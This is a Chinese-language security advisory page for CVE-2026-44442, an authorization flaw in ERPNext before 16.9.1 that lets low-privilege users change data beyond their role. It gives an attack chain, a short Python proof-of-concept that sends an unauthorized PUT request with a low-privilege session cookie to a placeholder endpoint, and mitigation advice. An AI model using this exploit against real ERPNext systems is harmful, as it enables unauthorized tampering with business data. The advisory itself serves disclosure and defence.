CVE-2026-44442 CVSS 9.9 严重

CVE-2026-44442 ERPNext权限提升漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44442

漏洞类型

权限提升

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ERPNext

漏洞概述

ERPNext 是一个免费开源的企业资源规划工具。在 16.9.1 版本之前，某些端点未能强制执行适当的授权检查。该漏洞允许用户修改超出其允许角色范围的数据，导致严重的安全风险。

技术细节

该漏洞源于 ERPNext 在处理特定 API 端点请求时，未正确实施基于角色的访问控制（RBAC）机制。攻击者只需具备低权限用户账户（PR:L），即可利用网络接口（AV:N）发起攻击。由于系统未对关键数据修改操作进行权限校验，攻击者可以通过构造恶意的 HTTP 请求，直接调用受影响的端点。成功利用后，攻击者能够绕过原有的权限限制，修改、删除或窃取本应仅限管理员访问的敏感数据。由于漏洞具备范围改变（S:C）特性，攻击者可能进一步利用此漏洞影响系统其他组件，导致机密性、完整性和可用性的全面丧失（C:H/I:H/A:H）。

攻击链分析

STEP 1

1. 获取初始访问

攻击者在 ERPNext 系统中注册或获取一个低权限用户账户。

STEP 2

2. 识别缺陷端点

攻击者分析应用程序，寻找缺乏适当授权检查的 API 端点。

STEP 3

3. 发送越权请求

攻击者利用低权限会话，向目标端点发送包含恶意数据的 HTTP 请求。

STEP 4

4. 数据篡改

服务器处理请求，未进行权限校验即修改了关键数据，导致系统完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example endpoint)
target_url = "http://target-erpnext.com/api/resource/SomeSensitiveData/1"

# Attacker's session cookie (Low privilege user)
session_cookie = {"sid": "low_priv_user_session_id"}

# Payload to modify data beyond permitted role
payload = {
    "sensitive_field": "modified_value",
    "status": "approved"
}

# Send PUT request to modify the resource
response = requests.put(target_url, json=payload, cookies=session_cookie)

# Check if the modification was successful
if response.status_code == 200:
    print("[+] Exploit successful: Data modified without proper authorization.")
else:
    print("[-] Exploit failed.")

影响范围

ERPNext < 16.9.1

防御指南

临时缓解措施

如果无法立即升级，建议管理员在网络层面严格限制对 ERPNext 系统的访问来源，并实时监控日志以检测异常的数据修改请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表